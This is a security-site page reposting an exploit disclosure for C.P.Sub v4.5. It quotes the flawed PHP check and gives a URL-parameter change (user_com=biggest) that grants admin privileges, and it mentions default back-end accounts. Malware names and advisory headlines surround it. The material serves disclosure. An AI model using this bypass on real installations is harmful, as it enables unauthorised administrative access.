The goal of this project is to make virtual world a safer and better place without child pornography, major computer crime and RIAA.
Login As
You can log in if you are registered at one of these services:
Security Bulletins
Latest Malware Updates

Infostealer.Posteal

02/26/2015

Downloader.Busadom

02/26/2015

Trojan.Ladocosm

02/26/2015

SONAR.SuspDocRun

02/25/2015

SONAR.SuspHelpRun

02/25/2015
07/01/2013

C.P.Sub 4.5 - Authentication Bypass

#!/usr/bin/python
#
#
####################################################################
#
# Exploit Title: C.P.Sub <= v4.5 Misconfiguration and Improper Authentication
# Date: 2013/6/27
# Exploit Author: Chako
# Vendor Homepage: http://www.cooltey.org/ping/php.php
# Software Download Link: http://cooltey.myweb.hinet.net/cpsub_v4.5.zip
# Version: <= v4.5
# Tested on: Windows 7
#
#
####################################################################

Improper Authentication:
==========================================

Description:
    C.P.Sub <= v4.5 use "user_com=" parameter to identify if the user has admin privilege.
    Therefore an attacker could simply change the value for "user_com=" parameter to gain admin privilege.


/check.php (LINE: 36-44)
--------------------------------------------------------------
if($_GET[user_com] != "")
{
  $user_com = $_GET[user_com];
}elseif($_POST[user_com] != "")
{
  $user_com = $_POST[user_com];
}
if($user_com == "biggest")
{
--------------------------------------------------------------


Exploit:
--------------------------------------------------------------

change
http://Example_Target/info.php?cookie=yes&;user_com=second

to
http://Example_Target/info.php?cookie=yes&;user_com=biggest



Misconfiguration
==========================================
There are some default accounts for C.P.Sub <= v4.5 that allows an attacker
to access back-end management page. It could lead to further attack.






Security Advisories Database

Remote Code Execution Vulnerability in Microsoft OpenType Font Driver

A remote attacker can execute arbitrary code on the target system.

07/21/2015

SQL Injection Vulnerability in Piwigo

SQL inection vulnerability has been discovered in Piwigo.

02/05/2015

Cross-site Scripting Vulnerability in DotNetNuke

A cross-site scripting (XSS) vulnerability has been discovered in DotNetNuke.

02/05/2015

Cross-site Scripting Vulnerability in Hitachi Command Suite

A cross-site scripting vulnerability was found in Hitachi Command Suite.

02/02/2015

Denial of service vulnerability in FreeBSD SCTP RE_CONFIG Chunk Handling

An attacker can perform a denial of service attack.

01/30/2015

Denial of service vulnerability in Apache Traffic Server HTTP TRACE Max-Forwards

An attacker can perform a denial of service attack.

01/30/2015

Denial of service vulnerability in MalwareBytes Anti-Exploit &quot;mbae.sys&quot;

An attacker can perform a denial of service attack.

01/30/2015

Denial of service vulnerability in Linux Kernel splice

An attacker can perform a denial of service attack.

01/29/2015

Denial of service vulnerability in Python Pillow Module PNG Text Chunks Decompression

An attacker can perform a denial of service attack.

01/20/2015